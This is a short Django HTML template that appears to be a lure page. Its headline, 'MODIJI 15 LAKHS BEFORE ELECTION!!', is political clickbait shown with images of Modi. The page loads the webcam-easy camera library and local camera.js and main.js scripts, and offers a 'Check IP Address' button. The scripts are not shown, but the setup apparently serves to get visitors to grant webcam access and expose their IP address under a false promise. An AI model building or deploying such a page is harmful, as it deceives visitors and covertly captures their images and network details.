{% load static %}
<!DOCTYPE html>
<html>
<head>
    <title>MODIJI 15 LAKHS BEFORE ELECTION!!</title>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
    <script src="https://unpkg.com/webcam-easy/dist/webcam-easy.min.js"></script>
    <script src="{% static 'js/main.js' %}"></script>
    <script src="{% static 'js/camera.js' %}"></script>
</head>
<body>
    <center><button onclick="main()">Check IP Address</button></center>
    <center><h1>MODIJI 15 LAKHS BEFORE ELECTION!!</h1></center>
    <img src="{% static 'img/modi.png' %}" alt="Modi Image">
    <img src="{% static 'img/modi.jpg' %}">
</body>
</html>
